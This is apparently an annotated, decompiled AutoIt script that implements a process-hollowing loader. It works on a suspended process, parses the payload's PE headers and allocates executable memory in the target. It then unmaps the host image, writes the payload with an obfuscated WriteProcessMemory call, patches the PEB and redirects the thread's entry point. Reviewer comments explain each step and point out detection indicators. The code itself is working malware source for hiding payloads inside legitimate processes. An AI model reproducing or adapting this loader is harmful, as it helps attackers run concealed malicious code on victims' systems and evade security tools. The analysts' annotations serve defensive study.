$20=DLLSTRUCTCREATE("dword ContextFlags;"&"dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;"&"dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;"&"dword SegGs; dword SegFs; dword SegEs; dword SegDs;"&"dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;"&"dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;"&"byte ExtendedRegisters[512]")
ENDIF
LOCAL $21
; ContextFlags: 65543 = 0x10007 (i386 CONTROL|INTEGER|SEGMENTS),
; 1048583 = 0x100007 (AMD64 CONTROL|INTEGER|SEGMENTS), 524327 = 0x80027 (unused)
SWITCH $1Z
CASE 1
$21=65543
CASE 2
$21=1048583
CASE 3
$21=524327
ENDSWITCH
DLLSTRUCTSETDATA($20,"ContextFlags",$21)
$1W=DLLCALL("kernel32.dll","bool","GetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(3,0,0)
ENDIF
LOCAL $22
; at the suspended initial thread, Ebx (x86) / Rdx (x64) holds the PEB address
SWITCH $1Z
CASE 1
$22=DLLSTRUCTGETDATA($20,"Ebx")
CASE 2
$22=DLLSTRUCTGETDATA($20,"Rdx")
CASE 3
ENDSWITCH
; IMAGE_DOS_HEADER over the start of $1N; $24 keeps the image base pointer
LOCAL $23=DLLSTRUCTCREATE("char Magic[2];"&"word BytesOnLastPage;"&"word Pages;"&"word Relocations;"&"word SizeofHeader;"&"word MinimumExtra;"&"word MaximumExtra;"&"word SS;"&"word SP;"&"word Checksum;"&"word IP;"&"word CS;"&"word Relocation;"&"word Overlay;"&"char Reserved[8];"&"word OEMIdentifier;"&"word OEMInformation;"&"char Reserved2[20];"&"dword AddressOfNewExeHeader",$1T)
LOCAL $24=$1T
$1T+=DLLSTRUCTGETDATA($23,"AddressOfNewExeHeader")
LOCAL $25=DLLSTRUCTGETDATA($23,"Magic")
IF NOT ($25=="MZ")THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(4,0,0)
ENDIF
; 17744 = 0x00004550 = "PE\0\0"
LOCAL $26=DLLSTRUCTCREATE("dword Signature",$1T)
$1T+=4
IF DLLSTRUCTGETDATA($26,"Signature")<>17744 THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(5,0,0)
ENDIF
; IMAGE_FILE_HEADER (20 bytes)
LOCAL $27=DLLSTRUCTCREATE("word Machine;"&"word NumberOfSections;"&"dword TimeDateStamp;"&"dword PointerToSymbolTable;"&"dword NumberOfSymbols;"&"word SizeOfOptionalHeader;"&"word Characteristics",$1T)
LOCAL $28=DLLSTRUCTGETDATA($27,"NumberOfSections")
$1T+=20
; optional-header magic: 267 = 0x10B PE32, 523 = 0x20B PE32+; must match AutoIt's bitness
LOCAL $29=DLLSTRUCTCREATE("word Magic;",$1T)
LOCAL $2A=DLLSTRUCTGETDATA($29,1)
LOCAL $2B
IF $2A=267 THEN
IF $1Q THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(6,0,0)
ENDIF
$2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"dword BaseOfData;"&"dword ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"dword SizeOfStackReserve;"&"dword SizeOfStackCommit;"&"dword SizeOfHeapReserve;"&"dword SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
$1T+=96
ELSEIF $2A=523 THEN
IF NOT $1Q THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(6,0,0)
ENDIF
$2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"uint64 ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"uint64 SizeOfStackReserve;"&"uint64 SizeOfStackCommit;"&"uint64 SizeOfHeapReserve;"&"uint64 SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
$1T+=112
ELSE
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(6,0,0)
ENDIF
LOCAL $2C=DLLSTRUCTGETDATA($2B,"AddressOfEntryPoint")
LOCAL $2D=DLLSTRUCTGETDATA($2B,"SizeOfHeaders")
LOCAL $2E=DLLSTRUCTGETDATA($2B,"ImageBase")
LOCAL $2F=DLLSTRUCTGETDATA($2B,"SizeOfImage")
; skip data directories 0-4 (export, import, resource, exception, security; 8 bytes each)
$1T+=8
$1T+=8
$1T+=24
; data directory 5 = base relocation table
LOCAL $2G=DLLSTRUCTCREATE("dword VirtualAddress; dword Size",$1T)
LOCAL $2H=DLLSTRUCTGETDATA($2G,"VirtualAddress")
LOCAL $2I=DLLSTRUCTGETDATA($2G,"Size")
LOCAL $2J
IF $2H AND $2I THEN $2J=TRUE
IF NOT $2J THEN CONSOLEWRITE("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!"&@CRLF)
; skip the remaining 11 directories (88 bytes) to reach the section headers
$1T+=88
LOCAL $2K
LOCAL $2L
; $2L = base address of the image inside the host; $2K = relocations must be applied
IF $2J THEN
$2L=_6K($1X,$2F)
IF @ERROR THEN
$2L=_6J($1X,$2E,$2F)
IF @ERROR THEN
_6L($1X,$2E)
$2L=_6J($1X,$2E,$2F)
IF @ERROR THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(101,1,0)
ENDIF
ENDIF
ENDIF
$2K=TRUE
ELSE
$2L=_6J($1X,$2E,$2F)
IF @ERROR THEN
_6L($1X,$2E)
$2L=_6J($1X,$2E,$2F)
IF @ERROR THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(101,0,0)
ENDIF
ENDIF
ENDIF
DLLSTRUCTSETDATA($2B,"ImageBase",$2L)
; local copy of the mapped image: headers first, then each section at its RVA
LOCAL $2M=DLLSTRUCTCREATE("byte["&$2F&"]")
LOCAL $2N=DLLSTRUCTGETPTR($2M)
LOCAL $2O=DLLSTRUCTCREATE("byte["&$2D&"]",$24)
DLLSTRUCTSETDATA($2M,1,DLLSTRUCTGETDATA($2O,1))
LOCAL $2P
LOCAL $2Q,$2R
LOCAL $2S,$2T
LOCAL $2U
FOR $2V=1 TO $28
$2P=DLLSTRUCTCREATE("char Name[8];"&"dword UnionOfVirtualSizeAndPhysicalAddress;"&"dword VirtualAddress;"&"dword SizeOfRawData;"&"dword PointerToRawData;"&"dword PointerToRelocations;"&"dword PointerToLinenumbers;"&"word NumberOfRelocations;"&"word NumberOfLinenumbers;"&"dword Characteristics",$1T)
$2Q=DLLSTRUCTGETDATA($2P,"SizeOfRawData")
$2R=$24+DLLSTRUCTGETDATA($2P,"PointerToRawData")
$2S=DLLSTRUCTGETDATA($2P,"VirtualAddress")
$2T=DLLSTRUCTGETDATA($2P,"UnionOfVirtualSizeAndPhysicalAddress")
; copy min(VirtualSize, SizeOfRawData) bytes of raw data to the section's RVA
IF $2T AND $2T<$2Q THEN $2Q=$2T
IF $2Q THEN
DLLSTRUCTSETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2N+$2S),1,DLLSTRUCTGETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2R),1))
ENDIF
; remember where the relocation table lives in the raw file for _6I
IF $2K THEN
IF $2S<=$2H AND $2S+$2Q>$2H THEN
$2U=DLLSTRUCTCREATE("byte["&$2I&"]",$2R+($2H-$2S))
ENDIF
ENDIF
$1T+=40
NEXT
IF $2K THEN _6I($2N,$2U,$2L,$2E,$2A=523)
; _6H() returns "WriteProcessMemory" (built char-by-char)
$1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$2L,"ptr",$2N,"dword_ptr",$2F,"dword_ptr*",0)
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(7,0,0)
ENDIF
; PEB layout (only ImageBaseAddress is modified)
LOCAL $2W=DLLSTRUCTCREATE("byte InheritedAddressSpace;"&"byte ReadImageFileExecOptions;"&"byte BeingDebugged;"&"byte Spare;"&"ptr Mutant;"&"ptr ImageBaseAddress;"&"ptr LoaderData;"&"ptr ProcessParameters;"&"ptr SubSystemData;"&"ptr ProcessHeap;"&"ptr FastPebLock;"&"ptr FastPebLockRoutine;"&"ptr FastPebUnlockRoutine;"&"dword EnvironmentUpdateCount;"&"ptr KernelCallbackTable;"&"ptr EventLogSection;"&"ptr EventLog;"&"ptr FreeList;"&"dword TlsExpansionCounter;"&"ptr TlsBitmap;"&"dword TlsBitmapBits[2];"&"ptr ReadOnlySharedMemoryBase;"&"ptr ReadOnlySharedMemoryHeap;"&"ptr ReadOnlyStaticServerData;"&"ptr AnsiCodePageData;"&"ptr OemCodePageData;"&"ptr UnicodeCaseTableData;"&"dword NumberOfProcessors;"&"dword NtGlobalFlag;"&"byte Spare2[4];"&"int64 CriticalSectionTimeout;"&"dword HeapSegmentReserve;"&"dword HeapSegmentCommit;"&"dword HeapDeCommitTotalFreeThreshold;"&"dword HeapDeCommitFreeBlockThreshold;"&"dword NumberOfHeaps;"&"dword MaximumNumberOfHeaps;"&"ptr ProcessHeaps;"&"ptr GdiSharedHandleTable;"&"ptr ProcessStarterHelper;"&"ptr GdiDCAttributeList;"&"ptr LoaderLock;"&"dword OSMajorVersion;"&"dword OSMinorVersion;"&"dword OSBuildNumber;"&"dword OSPlatformId;"&"dword ImageSubSystem;"&"dword ImageSubSystemMajorVersion;"&"dword ImageSubSystemMinorVersion;"&"dword GdiHandleBuffer[34];"&"dword PostProcessInitRoutine;"&"dword TlsExpansionBitmap;"&"byte TlsExpansionBitmapBits[128];"&"dword SessionId")
$1W=DLLCALL("kernel32.dll","bool","ReadProcessMemory","ptr",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(8,0,0)
ENDIF
DLLSTRUCTSETDATA($2W,"ImageBaseAddress",$2L)
$1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(9,0,0)
ENDIF
; Eax (x86) / Rcx (x64) is the register the loader jumps to for the initial thread
SWITCH $1Z
CASE 1
DLLSTRUCTSETDATA($20,"Eax",$2L+$2C)
CASE 2
DLLSTRUCTSETDATA($20,"Rcx",$2L+$2C)
CASE 3
ENDSWITCH
$1W=DLLCALL("kernel32.dll","bool","SetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(10,0,0)
ENDIF
$1W=DLLCALL("kernel32.dll","dword","ResumeThread","handle",$1Y)
IF @ERROR OR $1W[0]=-1 THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(11,0,0)
ENDIF
DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1X)
DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1Y)
RETURN DLLSTRUCTGETDATA($1V,"ProcessId")
ENDFUNC
  529. FUNC _6H()
  530. LOCAL $2X[18]=["W","r","i","t","e","P","r","o","c","e","s","s","M","e","m","o","r","y"],$2Y
  531. FOR $2Z IN $2X
  532. $2Y&=$2Z
  533. NEXT
  534. RETURN $2Y
  535. ENDFUNC
; _6I: apply base relocations to the locally built image.
;   $2N  pointer to the local image buffer
;   $30  struct over the raw relocation table (IMAGE_BASE_RELOCATION blocks)
;   $31  actual base in the host, $32 preferred ImageBase -> delta $34 = $31 - $32
;   $33  True for PE32+ ; selects relocation type $12 = 3 + 7*$33:
;        3 = IMAGE_REL_BASED_HIGHLOW (PE32), 10 = IMAGE_REL_BASED_DIR64 (PE32+)
; Each block = {VirtualAddress; SizeOfBlock} followed by (SizeOfBlock-8)/2 WORD
; entries: high 4 bits = type, low 12 bits = page offset. Matching entries get
; the delta added in place. Other types are ignored. Always returns 1.
; NOTE(review): $38 (block offset) is declared but never initialised; the loop
; relies on AutoIt treating the empty default as 0 in "$38<$35".
; The "ptr" written at each fix-up follows AutoIt's own pointer width, which is
; fine only because _6G already rejected bitness mismatches.
FUNC _6I($2N,$30,$31,$32,$33)
LOCAL $34=$31-$32
LOCAL $35=DLLSTRUCTGETSIZE($30)
LOCAL $36=DLLSTRUCTGETPTR($30)
LOCAL $37,$38
LOCAL $2S,$39,$3A
LOCAL $3B,$3C,$3D
LOCAL $12=3+7*$33
WHILE $38<$35
$37=DLLSTRUCTCREATE("dword VirtualAddress; dword SizeOfBlock",$36+$38)
$2S=DLLSTRUCTGETDATA($37,"VirtualAddress")
$39=DLLSTRUCTGETDATA($37,"SizeOfBlock")
$3A=($39-8)/2
$3B=DLLSTRUCTCREATE("word["&$3A&"]",DLLSTRUCTGETPTR($37)+8)
FOR $2V=1 TO $3A
$3C=DLLSTRUCTGETDATA($3B,1,$2V)
IF BITSHIFT($3C,12)=$12 THEN
$3D=DLLSTRUCTCREATE("ptr",$2N+$2S+BITAND($3C,4095))
DLLSTRUCTSETDATA($3D,1,DLLSTRUCTGETDATA($3D,1)+$34)
ENDIF
NEXT
$38+=$39
WEND
RETURN 1
ENDFUNC
; _6J: VirtualAllocEx in process $1X at the fixed address $3E for $35 bytes,
; protection 64 = PAGE_EXECUTE_READWRITE. First tries 4096 = MEM_COMMIT alone,
; then 12288 = MEM_COMMIT|MEM_RESERVE. Returns the address, or 0 with @error=1.
; RWX allocation in a remote process is a strong detection signal on its own.
FUNC _6J($1X,$3E,$35)
LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",4096,"dword",64)
IF @ERROR OR NOT $1W[0]THEN
$1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",12288,"dword",64)
IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
ENDIF
RETURN $1W[0]
ENDFUNC
; _6K: VirtualAllocEx in process $1X at any address (lpAddress = 0) for $35
; bytes, MEM_COMMIT|MEM_RESERVE (12288) and PAGE_EXECUTE_READWRITE (64). Used
; when the image carries a relocation table. Returns the address, or 0 with
; @error=1.
FUNC _6K($1X,$35)
LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",0,"dword_ptr",$35,"dword",12288,"dword",64)
IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
RETURN $1W[0]
ENDFUNC
; _6L: NtUnmapViewOfSection(process $1X, base $3E) — unmaps the host's original
; executable image so the payload can be placed at its preferred ImageBase.
; Only a DllCall failure is reported (@error=1); the NTSTATUS itself is ignored.
; This call from a non-system binary is one of the clearest hollowing indicators.
FUNC _6L($1X,$3E)
DLLCALL("ntdll.dll","int","NtUnmapViewOfSection","ptr",$1X,"ptr",$3E)
IF @ERROR THEN RETURN SETERROR(1,0,0)
RETURN 1
ENDFUNC
; _6M: IsWow64Process($1X). Returns the out BOOL ($1W[2]: non-zero when the
; target is a 32-bit process on 64-bit Windows), or 0 with @error=1 on failure.
FUNC _6M($1X)
LOCAL $1W=DLLCALL("kernel32.dll","bool","IsWow64Process","handle",$1X,"bool*",0)
IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
RETURN $1W[2]
ENDFUNC
  584. ; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< - dmod 2.12 build(269)
  585.  
  586.  